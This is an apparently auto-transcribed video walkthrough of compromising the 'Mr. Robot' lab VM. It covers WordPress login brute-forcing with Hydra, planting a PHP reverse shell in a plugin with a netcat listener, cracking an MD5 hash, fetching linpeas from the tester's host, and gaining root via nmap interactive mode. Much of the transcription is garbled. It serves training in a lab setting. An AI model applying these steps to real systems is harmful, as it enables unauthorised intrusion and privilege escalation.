Good morning, good afternoon, good evening. So today I'm so excited. I want to do a pen test of the machine Mr. Robot. Well, what I love about VirtualBox pen testing is a simulation. So before actually going into the field, you can actually have some skills, a whole lot of them, which you wanna master and stuff. So, Mr. Robot, to those who have watched Mr. Robot, you can actually relate what we are talking about right here. Okay, I'm not here to introduce you to the series Mr. Robot, but actually it's the best series for a cybersecurity analyst. So many times have I heard in them. I never knew what a honeypot was or what a key fob was. I didn't know most of those things, but through that series, I would actually learn, hear, listen, and relate. Okay, so the first things first, you always know me. I split my screen and I love risking running as root clear. And same applies to this sudo su and clear. Well, right. Like I always tell you, my laptop is an oldie but a goodie. It's always running 100% of its of its processes. So first things first, we want to locate our own self on the network. So here is our IP address right there. So what we're gonna do is to look for other devices connected on the network. We go like net discover discover minus internet 0 minus range slash 24 the whole subnet. So now it's going to look for the devices, and this is the nearest possible device we have. So now we're gonna take this, all of it, and copy the selection, clear the screen again, and run an nmap scan. Nmap, you see, I can't autocomplete. I can't do that. Why? Because my laptop is old. The arrows ain't working at all. Only the up and down arrows are the ones working. Nmap minus T4 minus A dash V dash P dash SV. I'm gonna press this and enter. And right here, I'm going to run a nicto scan. So nicto dash H. There you go. So we actually have found that we got port 443 open and port 80 open. So this is HTTPS, and HTTP. So now we're gonna come here and open our Fox browser. So now, right, you can actually see that it's running PHP 5.5.29. Let's see, we are running server Apache. Okay, wow. It's targeting port 80. Most CGI directories found. What for ship or possible directories? Oh, really? I don't put the C. I'll do that in the next scan. So, well, Nicto is not the only vulnerability scanner that we have, but when your computer is running 100% of its processes, it's good to stick on the terminal other than on the graphical user interface. So if you come here, you Kali, yeah, you can see it's taking its time. Ish. All right, let's try again. Let's be a little bit patient, right? Right, there you go. So if you come to vulnerability analysis, right there, You can actually see that you got OpenVAS, you got Legio, you got Linux, you got Nikto, you got Nmap, you got LinP, Zenmap. Oh, there's Zenmap. Wow, this is great. They made a Zenmap for Linux, and there's some fuzzing tools. Wanna see what will happen if we stress that server up? Stress testing, a lot of things you can actually see. Get a lot of them. But like I said, when your computer is running 100% of its resources, it's good to stick on the terminal because most of the graphical user interface might crash or crash the computer itself. So since you're running HTTP and HTTPS, we can actually look at what's happening or what's going on here, right? So it's gonna start transferring data from that. Only do that. Let's hope for the best here. To brute force file name, formula for index to found, index.html, index.php. Still scanning. I don't know what's this? I don't know. Oh wow. So we got another terminal here. Hmm, this is interesting. It actually looks as scary as it was on Mr. Robot series. So we log in as root and this is the password. Okay. Hmm. Hello friend. If you have come for a reason. You may not be able to explain it yet, but there is a part of you that's exhausted with this world. A world that decides where you work, blah blah blah. And we'll be talking about a lot of stuff right here. Okay, so like we say, this is a web server, so we are going to try web penetration testing, right? So the first thing is to know who the website is itself, right? So I'm gonna split the screen again. This time horizontal. I thought I didn't I? Root F's what? Okay. How you empty field, blah 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 blah. Alright, so here are the commands that we can use. But I was wondering if we can do other commands or something like ls command not recognized for list of commands. Okay, so what I thought was writing all these commands. I don't think there's anything interesting. Maybe if I go F society, because F society was the group, right? That was doing the X. Maybe they wanna tell us something interesting. I don't know. Oh, I don't think there's anything interesting here. Prepare. It's like these are just videos. They're just giving us, and they're eating up my RAM a lot. And I hate it. Look, now my PC is extra slow. Okay, nice. The nmap scan is done. So let's first exit this one. Right. So let's go up. Ah, really hate this. Ah, it's taking long. I wonder how it feels to do a penetration test with a supercomputer, like a gaming PC, which is super fast. Like, I can only imagine. But I know the time will come someday when I will be doing that too. I know that. But I will be having those supercomputers, which is something everyone or nearly all hackers or pen testers hope for and pray for. So we got something interesting here. We got port 22, which is SSH, is closed. Ooh. So we're going to get access to the PC, but like I used to get access with SSH, and I was used to it. Okay, yeah, here comes another food for thought. I know whatsoever. But today is not a Sentimental Monday. Uh, Today is Sentimental Monday, and eesh, how am I going to do this? I'm not used to stress things up on another day like this. Okay, so this is wexample.com. Okay, that's the alright. So this is a certificate, but 25. Alright, public here I see. Just the mark. The computer might be a 94%. Yeah, it's actually a Linux. Alright, great. So we got all this information that you want to use. Okay. Oh, we got a WordPress. This is a WordPress. Wow. Okay. So what I'm gonna do it. Can I click that? Yeah, I did. Yes, I did. So I'm going to clear. And now I'm wondering what other pages can I find right there. So I'm going to use deb. Right. Should I use GoBuster? Okay. Okay. GoBuster. We want the directories of the URL. Alright. It's not. My PC is slow. Anybody to bear with me? Anybody? Anybody to bear with me? Yeah, I see. Alright. Minus word list user share word list deb common dot text. Oh, so what I'm saying here is, hey GoBuster, I'm looking for some directories in this URL, and I want you to check any directories or any files which are in line with these names I just point you, which are in this common.txt file. And then I'm gonna press enter right now. Yeah, it's now going to do that. Please forgive my piece, it's very slow. I told you we have a WordPress. So okay, so what's username? What might be the username? Let's try admin. Right, admin, admin. Let's try that. Wow. I'm not gonna save this now, as I ain't sure if that's true. So look at what we have right here. We got an admin panel, we got some atom. Okay, okay, okay. We got GoBuster, like it's finding all these files, and Nicto should do something. And I'm actually waiting. Okay, wow, all right. Error invalid username. Lost your password? Wow, now there comes a problem. There comes a problem. I don't even know the usernames. Um, I don't know what to do now. Right. I'm thinking. I'm thinking. Maybe it's F Society. F Society. But still, it's not gonna help because I don't even know the username and the password, right? Right. Huh. I don't know. I don't know. Right here, what I'm gonna do is actually crazy. You know what? My PC is running 100% of its resources. Now, this was the best time to use burp suit, right? Yeah, this was the best time to use burp suit. Use burp suit to try to get some usernames based on the response length or the response time delay, right? And I don't even know what to do. Oh, okay, okay. I got WP scan, right? Let me just try that. Maybe it's gonna help me enumerate some things. I don't, I, I don't know. Yo, please bear with me, right? Bear with me. Oh, there's the segment. Wow. Yeah. Most of the times you can actually get the usernames from the sitemap, right? Something like that. Especially if it's if it's a WordPress. All right. Invalid username. All right. So we're gonna try WPS scan. Wow, this is very very interesting, isn't it? You know, when you are not alright, so let's do this. WP scan minus URL. Gonna paste that and I'm gonna slash word WordPress. So I need to know that it's a WordPress site. And minus WP content uh, directory dir, and we want you to look at all of these. And what I really want is the usernames, and I'm gonna just hit enter. Alright, so let's come back here to this step as this one runs. I'm pretty much afraid that this piece is gonna crash. So okay, we got content includes loads settings action with the register. Alright. Page login RSS. Yeah, a moment of silence. When we actually deep meditating and thinking about all this, what to do, and like actually looking at, oh my guy, this is actually another thing. All right, let's try this way. Is the sitemap. Let's start with the sitemap maybe. Well, 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 well. Site map. There we go. What we got in the sitemap right there. All right. What if we say .xml? .xml. Is there error? No root element found. So let's just duplicate the tape. All right. Which one might be interesting? WP config. All right. Oh, there are those JavaScript files. JS. JS. Maybe I'm gonna hit code. No. I said JS slash JavaScript. Oh, JS is forbidden. Let me go back to where I came from. Alright. How about the robots? Oh, not here. Maybe we're gonna find something in the robots. In the robots. Oh wow, well I'm doing a pen test. I'm not hunting for flags right here. So this one should back it up a little bit. So I'm really interested in this one, the dictionary. So it's possibly that it's a dictionary file that we got some interesting names in there. So what I'm going to do is I'm gonna say W get what do you wanna get? You wanna get this, okay, slash F society. Is that F society dot dic, yeah, it's the dick for dictionary. Please bear with me. You saw the spelling right there. Don't say a word. Don't you ever dare. Alright, so now it's gonna get that. And how about our WP scan? Did it get anything? I'm doing database. Oh man, I don't have internet access. So this was possibly a worst stage. I feel you, my guy. I feel you. I'm so sorry for that. So right now, what do we have here? Oh, this one file contains the credentials. Alright. Oh, let's actually have that. Alright. Yes, it's found. Alright. No, but let me just. Oh, it's wp-config.php. Let's see, maybe we're gonna find something interesting. wp-config.php. The thing is, I'm skipping. When you're doing a web penetration testing, you need to look at all the files that you've seen. Click all the links which are available. But for the sake of our time, I'm just going to try to get some luck, maybe, I don't know. Skip some and just follow my intuition and my hunches to try to see where I can get some of these things which I want. So this one, I can view the page source. So like, something is wrong. Wow, there's just one right there. So why would they say that? View the page source, maybe the owner put the usernames and lost person. No, are you lost? No, am I lost? Alright. Wow. There's nothing interesting here. Alright. So now, what is 6.91 megabytes? Oh, what the hell? That's actually something else. That that is big. Okay, so what I'm gonna try is I'm gonna see if we got something like WP JSON, WP um, JSON, Page not found. Okay. What about and which is this is default. So it's WPG. So WP version 2 uses. Hmm. We are not getting a hit, but for that dictionary we have right now, unless we got that one. So what we're gonna do is, we're gonna what less F society that. So we can see all these names: Mr. Robot, Elliot, name, and some names right here seem to be, yeah, they seem to be repetitional. So what can we do with that? Well, this word list is long and very long, but we haven't get a username yet. Oh, but I feel like whenever you are told about Mr. Robot, right, what first comes in your mind is Elliot. Yeah, it's Elliot. But it was Elliot, the Mr. Robot in the series. I don't know. Well, the good thing about WordPress is it gives you some errors which are very interesting most of the times. But for real, I don't know what just whenever you're told of Mr. Robot, you think of Elliot because possibly he was one of the key characters in the movie, and that was quite interesting. All right, so now I'm being forced to click on all this. What's that? All right, all right. Wow, there's nothing interesting. Oh, the password you entered for the username Elliot is incorrect. So this is a name called Elliot. Wow, that. Whew, yeah, I see. I see when I saw that in the FBI movies online or on TV, they'll be like, I got this in my hunches, and you see that is true. So now we got somewhere to start from. So now with this word list, which is very long, we can actually resort it. So what I'm going to do is to use the sort command, right? I mean, sort. I want to show you how it works. Sort minus L like this. So I'm going to use this unique the checks for strict ordering without blah blah. It reorders the names in the word list and filter out the other ones. So maybe you can do sort uh, as you of society, and then when I put it in another decode of society dot text, and there you go. So if I do ls minus l, you see that we got another file right here which is relatively small than the first one. So you can clear the screen. There's so many ways to sort that out. And I thought that here we're going to get something interesting, but seems like, well, we didn't get something interesting. Alright. So now what we want to do is to crack that password using this dictionary file, because so like this was taking all this time. Just give me some time. Alright, cool. Now we are back. I'm so sorry about that. I don't know why it always happens when I'll be doing a pen test. Right. So here we are back now. So what you're gonna do right here is to try what happened. Yeah, I told you my PC is relatively slow, very very slow. You just have to bear with me, right? Please bear with me. Uh, you know what? I'm actually feeling very good. You know, when you love something but you don't have resources and the resources are limited, you actually feel demotivated. But there's this feeling I get sometime of just keep on doing it, hoping for the best. That one day maybe somebody's gonna say, "Hey man, hey, what up, yo? You gonna this, right?" Yeah, but at times, to be honest, just to be honest, I feel like quitting. Like, let's just try this Hydra thing, but maybe we're gonna get a hit. It's very slow. I'm gonna skip this moment in the video because it's very very slow. Man, okay. So what we're going to do right here is we want to try and use a tool um, for for password cracking. And to those who remember, you know the tool name is Hydra, right? So I'm going to be using Hydra. But before I use Hydra, I need to get something right here. So I'm going to right click and I'm going to inspect the activities here. Now the disadvantage is, like I said, the computer is 100% of its resource. So I'm not going to be using WebSuite for that. So right. So right here we are going to come to, we are in the inspector tab, right? So we want to go to the network possibly. I think it's the network. So when we gonna put and we're gonna put the password to this password and then hit enter. We're gonna see all the requests happening right here. The transfers, whatsoever is happening right here is the post, get, the whatnot one. So I'm gonna come back there. So for the meantime, what I'm gonna do is I'm gonna say Hydra. Please log in with the user Elliot and use the password. I'm going to tell you that the password is F society.txt, right? And use this URL as it's what? Wait a minute. Who are you? 168.198.129. 192.168.198.129, like that. And I'm going to be using the HTTP post form. That's the form that I want to attack, bro. And here is the link or whatsoever. So this one I'm going to get from here. Okay, the post. There should be some headers right. I don't know where I actually get it, but maybe no, it's the request. No, info, like that. So now it's log. Instead of putting password here, we said the password is supposed to be right there in like in the word list, right? So wait, okay, cookies one. So then let's actually look at the response, the raw response if possible. Alright, this is the response we got, but the request is the one we really want. So I'm gonna take it up to the password. Yeah. So this same method I'm using, we're, we're going to have the same method also to get the usernames if I didn't magically just think of Elliot. So I'm going to say here is the form. It's WP login, right, dot PHP. This is the page that I want. And here is some information about the page. So I'm going to paste that. The login is Elliot and the password is that. So the password, we said we're going to take it from the word list right here, right? So it's gonna be, I'm gonna put some up arrows and put a capital letter pass like that. And in the front of it, I'm going to put the error message that I was seeing. So I'm saying if you're gonna check for this error message, right? This is what the page should tell you if the password is wrong. But if the password is correct, it shouldn't give you an error message, and you must tell me that it didn't give you an error message. So I'm just gonna write error. If you were precise, like if we were looking for the username, we would have put the whole error message so that it was going to eliminate that error message and give us a hit whenever there is a new error message. You see, that's the best, that's the thing about password cracking, reverse engineering, whatsoever, because that's the only thing we know. And so, if that's the only thing we know, then we have to eliminate it and get something new. When you get a new error message, you're gonna be happy. So, I'm gonna wait. Let me just split my screen down here so that maybe you can get a hit of what I was doing with Hydra. So if you just type Hydra and you press enter, it's going to give you some help. So this was the basic example, but you can actually look for another one, for maybe another service module. You see, and see the help for that service emoji. So when you put -u, and then you look for the service that you want. So if I put, all right, Hydra minus u like that, and I put HTTP post, right? I guess that's the only one there. That's the only one. All right, so yeah, it is whatever. What was it? HTTP post. Oh, HTTP post form is here. So I'm going to put post form, and it's going to tell you now login user. If you are using yeah, you can actually read all this. Yeah, you can read all that. You can put a successful condition if you want, or if you know the successful condition. But basically, you can actually put that. So you can actually put, look, here is the condition. When it's incorrect, that's when you just put a slash. And the user, if you are using a user, the word listed as your user, just put these two as the same, and blah blah blah. Okay, nice. You actually got some hint about what I did right here, right? If it's log, if it's log, you put those log according to what the browser is saying. Not all browsers do the same, but so I'm going to clear the screen and exit possibly, and then I'm gonna press enter, and it's now going to it's going to start that brute force attacking. So this is what we call reworking, and we're gonna just wait a little bit. So I'm gonna skip this portion of the video and go next. So here we are back right now, and yeah, it didn't take quite a while because we had trimmed off some of the unnecessary data inside that word list file. So now here is the login, Elliot, and the password that. So like I said earlier, the same way I did for the password, or the same way I would have done for the username, but just that I had this other feel of thing about Elliot and stuff. So now let's try to log in and see if we got a hit. All right. Well, where is it? I'm gonna copy that. Wait, I'm gonna copy it like that. Copy, copy the selection, and we're gonna paste it. Paste. Wow. Okay. So I'm gonna log in right now. I'm not gonna save it right now because I'm not sure if I will successfully log in. But let's just try it and see. Now we got a dashboard. So now let me save this. This is true. Well, wow. There we go. So yeah. So I don't think this will be necessary at all. I got a panel right now. I got a panel. And thanks to you, man. Thank you so much. Although you were not rude. Okay, so it's taking quite a while, this piece of mine rendering all this stuff and doing all these things is gonna take it a while. Let me just duplicate the tape. Maybe I will need another tape some other time. Yeah, so we are now getting into the dashboard right there. the user's blog dashboard, and here it is. So you can actually see this is a WordPress website, and wow. So now what you want to do is you want to get a reverse shell from this thing because you are now in it. So how do we go about it? Well, I'm not a good programmer, but you know what? I know how to read the code and how to use other people's code. So I know some people just call me a script kiddie, but I don't think that's actually a good way of calling me. I'm not a script kiddie. All right, so we got that, and we're gonna check all my extension right here so that they can be near me. So this so-called open lines, I think I explained it last time when I did the box of academy from the TCM security. So this one shows you the technologies that a website is using, right? So if I say I'm okay with that, you're gonna note that it's gonna show me the languages, the yeah, all this. Which what we get we get I didn't know. This is my SQL database right here. Oh, how about on the user's login form? I'm not sure. Let's check. Maybe we actually was looking for these things and there was an SQL injection. Never thought of that though. Okay, so now what we do here is we come to this one called Actus, and then I'm gonna wait for it to open a little bit. It's opened. All right, so we're gonna wait for it to open. This one has got some hack codes, like some. It's quite a handy tool, you see. So here we got a reverse shell, but we don't want to do a reverse shell. We want to do a PHP reverse shell, you see. So what we're gonna do? This is from Pentest Monkey. It takes some web shell from uh different users. I don't know, different whatsoever. So what we're gonna do is I'm gonna put my IP address. That's 192.168.198.128. Right, there you go. And then I'm going to put the port to listen to. That's 4444. And if you want to view the code, you can actually view it here. There you go. You can actually see the reverse shell, the code, the whole code. But I'm not interested in that. I'm not. I'm just gonna copy the code like that. I'm gonna copy it. So where am I going to put it? I'm going to put it here in the plugins, right? So the plugins run in PHP, most of them. So what I'm going to do, I'm going just going to the plugins right there and wait for them to open. Just wait a little bit, tranquilo. You're gonna get sound right. While it loads, let me just go right here to the login and see if there is an SQL right here. Yes, there's an SQL. This is my SQL right there. Uh, what if I say oh one goes to one and window this and try to log in. I'm just waiting. Okay, so the plugins have loaded. So I'm going to look at the plugins and just gonna try to, yeah. So I want to try to edit. You see, these ones are deactivated, so I'm just gonna try to edit the contact form. You can take any plugin you want, which you are good with, according to your taste and preference. So I just preferred the contact form, right? Yeah, that was my preference. Please don't judge me. So it's a valid username. So if I had time, I would have used a tool called SQL map. SQL map. This one was going to it was going to try and help me, brute force or try to do those SQL injections. So I want to edit this plugin. So what I'm going to do, like I have already copied that code. Sorry. So all I have to do is to get in here, right, and just press enter. And then I'm gonna paste the whole thing. If you note that it's gonna have some two closes for the PHP and some two openings for the PHP, that you just have to remove these both of those. I'm gonna look for the start. Here is the start of the reverse shell. I'm gonna remove that PHP. Why did I remove them? Because we have already a closed PHP here in the plugin itself. Wait. And we got another opening. We got an opening here of the PHP already. So I'm just gonna update the file. And back here, this is the tool I've been telling you about the SQL map. This one, this is the one that you can use. You put the URL, the target, yeah, is the PHP ID one and stuff, and then you can actually go now and try to test. You can use the O just to receive everything, just to retrieve the database current user, the schema, just to dump all database tables entries. You can do a lot of stuff with this. Maybe I'll actually have an opportunity to do that sometime with another box. So now I just edited this and it was edited successfully. So I'll go back to my plugins. But before I activate the plugin, I'm going to listen. So I'm going to say Netscape, listen, hello to the spot 444, and I press enter. So now, yeah, it's going back to the plugins, right? And what I'm going to do is to activate that plugin, and you see the magic. What will happen right there? It will be quite interesting, and that's the thing about box. You have to think. You have to try and think outside the box, isn't it? Yeah, my PC is very slow. It's very, very slow, but please bear with me. So this is the plugin that I just edited, and when I click activate, it's now loading. Wow. We wanna wait for it to activate, and boom, show that it is activated. We just got a reverse shell right now. So before I go any further, what I'm going to do right here is to make my reverse shell stable so that I can get some more functionalities, isn't it? Yeah. So I'm just gonna come here. Um, no, I'll come here to the TTY. a fully interactive Python tutorial. And most of these Linux has got a Python installed. So I'll just look for some and say which Python. You see there's the Python right there, and I'm just gonna paste what I've copied already. And boom. And now I can now export the terminal. So export term equals to x term. So now I can do clear. Boom. Right. So right now I'm just gonna say ls. What do we have here? We got home. Let's go to the home directory. cd home ls. Oh, we got a user called robot. cd robot. What do we have? We got the key.txt file and the password.raw md5. So now let's get that password because we now want to get root privileges. We actually have access to the PC, but we want to get root privileges. So possibly I don't know who's that, but maybe there's another account that we got. Oh, there's the password for robot. So I'm just gonna copy this. I'll copy it like this. Why is it doing this sketch history? Copy selection. I'm going to split my screen and I'm going to echo and put it in a file called robot.txt. Right. And let's see the root flag though, but I'm not interested in finding flags because in real world scenarios we will never be looking for flags in machines. So cat key to of 3.txt. Oh, we don't have permissions to do that. Wow. ls la. Wow. Okay. The root can only is the only one who can read it. Can move it. Key to of 3.txt. The temporary fault. Ha, the permission is denied. Okay, nice. So now what we're gonna focus on is this hash file, right? So we're gonna use hash identifier for that. But it's already written, it's a raw MD5. So why do that? So what we're gonna do is right now I'm going to use this tool called hashkit to try and crack it. Hashkit minus M0 is for MD5. That's robot.txt. When I use the word list user share word list rock.txt. So I'm saying hashkit, please crack this file, this MD5 file, robot.txt, crack the hashes inside and use that one. So I'm just gonna click and then start it. Well, Hashcat uses a lot of computer resources, and I'm actually afraid and scared that my computer might crash. If it does, I'll just I'm not gonna skip the moment as such, but I will restart it and crack it again so that you can actually see how this thing works or how I got the password that I'll be using later if I'll get it. Oh, so another moment of silence. Hey, there we go to the password. Dang, never expected something like this. The password is A B C D E F G H I. This password is long enough. I don't ever expected the password. Okay, we're gonna copy that and I'm gonna exit. So what I'm going to do is I'm going to change my user. So Sue robot like that. Since we don't have SSH, but if we had SSH, we would have attempted to log in with what? With SSH. And then I'm gonna put the password in. I'm now in robot. So I'm gonna clear. What do we have in robot? Oh, can I now get that key dot what not what key two of three dot text? Come on, I did. But I'm not yet root sudo su. I can't get into the root. Wait, cd sudo su is not a subjour file. So how do you go about it? So let me see, where am I? What's my ID? I'm robot. Can I cd back? Or can I cd back? Can I cd slash? Can I go into root? I can't go into root. So let's clear that. And you know what time is it now? It's time for lean peas. Lean peas. Okay. So I went to lean peas like that. So I'm going to get a wget http 192.168.198.128 slash leanpeas.sh. So here I'm gonna start python -m http server on port 80, and you're gonna see that we got a server running. There you go. And if I press, no, it's not gonna work in there. Dang, yeah, I don't know what okay, I went to cd to the temporary folder. Yeah, I can't do that in that folder I was, but in the temporary folder I can actually do that. wget http //192.168.198.128 slash leanpeas.sh. There you got it. And then I'm gonna stop this because my computer is running 100% of resources, and I'm gonna possibly exit. You know, when I was cracking that password with Hashcat, I was actually holding my heart saying, I don't want it to crash because Hashcat needs a lot of resources. So I'm going to clear, and then I'm going to give it some executable permission chmod plus execute lean piece.sh. And then now what we're gonna do is to run lean piece.sh. Once you see this, now we are about to reach to the end. So when you see a red, yellow, know that these are 95% attack vector. A red one, we should look at it. It can work, it cannot. A light green, these are just users with consoles, yeah, nothing much. And the blue one, users without consoles, please. And the green one, these are just common things like users group, like basic information. And then a light magenta or a purple is my username. So it's actually doing this thing. I don't know how this person did this. Look at how beautiful this art is, and yeah, that's lemon peas. It's actually a peas, a green peas, right? Inside its shell, but it is a Linux type of a peas. That's why I called it a lemon peas. You see, people are motivated with different things. Some are motivated by peas, some are motivated by penguins, some are motivated by ducks. Oh man, like the cybersecurity world is just an amazing world. Some are motivated by dragons, some are motivated by raspberries, some are, I don't know, but it just like, okay. So, all right, like that. Whoa, whoa, whoa. We got a lot of information here. Let's start from the top to the bottom. All right. Now let's go down. Oh, we got a hell. Wow, there was an exploit, a system exploit, right here, a kernel exploit. So he just have one right here. Okay. Wow. Oh, it has got a vulnerability of dirty cow. Yeah, dirty cow is one of the vulnerabilities. You can actually use this one to get into. It's a kind of vulnerability, I guess. Oh, these vulnerabilities. Hmm. Well, I want to run to the suite by now. Those are the first things I look at most of the times when I'm doing this. But I have to also learn kernel exploitation. But it's quite easy because when you just go to the site, they'll tell you how to do the exploit and you're gonna do it. Okay, so alright, where are the suite binaries? I'm done. Oh no, no, I am not yet done. It's still loading. So here, oh, we got yellow, red right here. So yeah, yeah, the sweet binary, right? So the sweet binary is for anyone. Well, lucky for me, I did this. Wait a minute. There you go. Oh, where is this? I have I cloned this site for sweet whatsoever. You can actually use it to your own good. Yeah, this is a handy site for privilege escalation. So it's gonna open that. But I actually know how to do it with Nmap because Nmap has got this interactive, um, interactive what you call interactive mode whereby you start interacting with Nmap and you can actually change it to going to use the terminal in that interactive mode. I did that privilege escalation by TCM security, and yeah, that was one of the method I saw, and it's quite interesting. So the site is called GFO Beans. So I I I duplicated it with HTTP track as you saw, and so now all you can do here is to write nmap And once nmap comes, you just look forward for the suite. And so this is how they said you're gonna do it. You install that which nmap file data inside regular nmap. Wow. So I never tried this, but maybe I'm gonna try it. Oh wait, it does not drop the level. This is option B. This is the one I know, but this one, let's try it. I never tried it. I never did. So maybe I don't know. Because sweet banners are quite easy to handle. So it's still loading. It's still loading. Yeah, I never tried this. But this is the one I was talking about, to run nmap in interactive mode, and then you run nmap sh whatsoever. So let's just wait for this one to finish. Oh, why is it taking long right now? All right. Yeah. Oh, it wasn't taking long. It's my terminal which is down. So let's see if we can run nmap as sudo a b c d e f g h I j k l m n o p q r s t u v w x y z. Not at all. So you can run nmap as root. So what we're gonna do right here is to nano main.sh. We're gonna paste this. And we're gonna exit. Oh, I just suspended, man. Uh, Alright, and see, I'm gonna start the whole process again. Um, and but this time I'm just gonna refresh that. Okay, I'll refresh this one. Alright, just gonna try my best. This has been one of my longest pen tests. If the banner is sweet, be safe, it does not drop the privileges and may be abused to access the person. escalate or maintain access a suite each is used to run SH. Omit the DHCP argument on systems like Debian that allow the default SSH to run its suite privileges. A copy of the binary allows it to maintain it. Alright. Alright. Okay. What? Activate that. And right now we said it's it's Python import. Let me just copy this. I missed which is like okay, let's go Python. That input OS.system. It's not showing me whether I'm actually doing Python /bin slash this. What's the sprint again? This is okay. So let me just do it the way I did it last time. Yeah. Let's go 10. Next 10. So So what I'm going to do right here is I'm just going to use the way I'm used to nmap interactive. Nmap as well as interactive. Then I'm going to put this H. Now I can do ID and C with we are now the root. Now the robot, but it just got root privileges. So now I can ls cd to root, I can ls and see what's inside ls. So this one got nothing inside, but you got the key, 3 out of 3. So just to prove it, let me just get, because this the key out of 3 out of 3 was got only one user can use, but the root user can actually read it. So it's key 3 of 3 dot text, and boom, there we go. So we actually had some root privilege, and we can actually do all this. So yeah, that was it for today. It was quite interesting that we got a root on the machine, Mr. Robot, which was another virtual machine on its own, which is quite interesting and very, very long, time consuming to actually navigate it. Thank you so much. Don't forget to remember me in whatever way possible. Bye.